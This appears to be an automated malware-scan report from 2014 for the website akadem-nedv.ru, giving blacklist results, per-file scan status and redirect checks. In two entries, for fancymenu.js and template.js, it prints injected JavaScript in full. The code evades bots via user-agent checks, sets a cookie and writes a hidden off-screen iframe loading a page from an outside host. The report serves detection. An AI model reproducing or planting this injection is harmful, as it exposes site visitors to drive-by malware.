Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=akadem-nedv.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://akadem-nedv.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://akadem-nedv.ru/ | 200 OK Content-Length: 28570 Content-Type: text/html | clean |
http://akadem-nedv.ru/media/system/js/caption.js | 200 OK Content-Length: 5297 Content-Type: application/javascript | clean |
http://akadem-nedv.ru/plugins/content/attachments_refresh.js | 200 OK Content-Length: 1082 Content-Type: application/javascript | clean |
http://akadem-nedv.ru/media/system/js/modal.js | 200 OK Content-Length: 13701 Content-Type: application/javascript | clean |
http://akadem-nedv.ru/plugins/system/modalizer/modals/jquery.min.js | 200 OK Content-Length: 62760 Content-Type: application/javascript | clean |
http://akadem-nedv.ru/plugins/system/modalizer/modals/colorbox/jquery.colorbox-min.js | 200 OK Content-Length: 12971 Content-Type: application/javascript | clean |
http://akadem-nedv.ru/templates/yoo_enterprise/lib/js/addons/base.js | 200 OK Content-Length: 4923 Content-Type: application/javascript | clean |
http://akadem-nedv.ru/templates/yoo_enterprise/lib/js/addons/accordionmenu.js | 200 OK Content-Length: 4507 Content-Type: application/javascript | clean |
http://akadem-nedv.ru/templates/yoo_enterprise/lib/js/addons/fancymenu.js | 200 OK Content-Length: 11337 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o if (!control_agent()) { var cookie = getCookie('kegaoeutg18sf'+'fekfsj3asjf'); if (cookie == undefined) { setCookie('kegaoeutg18sf'+'fekfsj3asjf', true, 172804); document.write('<'+'if'+'ra'+'m'+'e'+' s'+'r'+'c'+'='+'"http://magazine.innovatest.com.ar/gerfsbrenrsh19.html" st'+'yle="posi'+'tion:absolute'+';'+'left'+':'+'-'+'1284'+'px'+';'+'top'+':'+'-'+'1284'+'px'+';'+'" height="134" width="134"><'+'/'+'if'+'ram'+'e'+'>'); } }; })(); Antivirus reports:
| ||
http://akadem-nedv.ru/templates/yoo_enterprise/lib/js/addons/dropdownmenu.js | 200 OK Content-Length: 5980 Content-Type: application/javascript | clean |
http://akadem-nedv.ru/templates/yoo_enterprise/lib/js/template.js | 200 OK Content-Length: 3145 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0}!function(){function e(e,t,o){var r=(e+"").toLowerCase(),i=(t+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,o))?n:!1}function t(){var t=["Linux","Windows NT 6.3","Yandex","rv:11.0","AppleWebKit","Googlebot","Android","IEMobile","Windows NT 6.2"],o=!1;for(var r in t)if(e(navigator.userAgent,t[r])){o=!0;break}return o}var o if (!control_agent()) { var cookie = getCookie('kegaoeutg18sf'+'fekfsj3asjf'); if (cookie == undefined) { setCookie('kegaoeutg18sf'+'fekfsj3asjf', true, 172804); document.write('<'+'if'+'ra'+'m'+'e'+' s'+'r'+'c'+'='+'"http://magazine.innovatest.com.ar/gerfsbrenrsh19.html" st'+'yle="posi'+'tion:absolute'+';'+'left'+':'+'-'+'1284'+'px'+';'+'top'+':'+'-'+'1284'+'px'+';'+'" height="134" width="134"><'+'/'+'if'+'ram'+'e'+'>'); } }; })(); Antivirus reports:
| ||
http://akadem-nedv.ru/modules/mod_yoo_carousel/mod_yoo_carousel.js | 200 OK Content-Length: 5898 Content-Type: application/javascript | clean |
http://akadem-nedv.ru/index.php | 200 OK Content-Length: 28579 Content-Type: text/html | clean |
http://akadem-nedv.ru/usl.html | 200 OK Content-Length: 15899 Content-Type: text/html | clean |
http://akadem-nedv.ru/usl/usl1.html | 200 OK Content-Length: 27723 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: akadem-nedv.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 09 Oct 2014 00:49:30 GMT
Pragma: no-cache
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_jk/1.2.37 mod_bwlimited/1.4 mod_qos/10.10
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 09 Oct 2014 00:49:30 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 8f1e4288b2fd0e05d89fa3b9702bb688=821d8ce085c31de7f9e83da76bb6deb1; path=/
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: akadem-nedv.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 09 Oct 2014 00:49:30 GMT
Pragma: no-cache
Server: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1e-fips DAV/2 mod_jk/1.2.37 mod_bwlimited/1.4 mod_qos/10.10
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 09 Oct 2014 00:49:30 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 8f1e4288b2fd0e05d89fa3b9702bb688=821d8ce085c31de7f9e83da76bb6deb1; path=/
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: akadem-nedv.ru
Referer: http://www.google.com/search?q=akadem-nedv.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: akadem-nedv.ru
Referer: http://www.google.com/search?q=akadem-nedv.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.